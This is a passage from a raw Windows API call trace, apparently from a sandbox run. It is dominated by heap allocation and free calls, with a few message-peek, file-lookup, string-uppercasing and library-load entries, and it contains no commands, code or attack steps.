dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0214.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0214.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0214.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0214.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0214.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0214.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0214.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0214.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0214.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0214.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0214.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0214.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0214.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0214.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0214.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0214.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.900] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/X3KII9Ky2zq5leE1M.mkv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd98edae0, ftCreationTime.dwHighDateTime=0x1d5ceb8, ftLastAccessTime.dwLowDateTime=0x6325c920, ftLastAccessTime.dwHighDateTime=0x1d5cf7d, ftLastWriteTime.dwLowDateTime=0x6325c920, ftLastWriteTime.dwHighDateTime=0x1d5cf7d, nFileSizeHigh=0x0, nFileSizeLow=0x5b7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="X3KII9Ky2zq5leE1M.mkv", cAlternateFileName="X3KII9~1.MKV")) returned 0x9e1bf8 [0214.900] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0214.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0214.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.902] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.902] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0214.902] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0214.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0214.903] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0214.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.904] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.904] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.904] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: 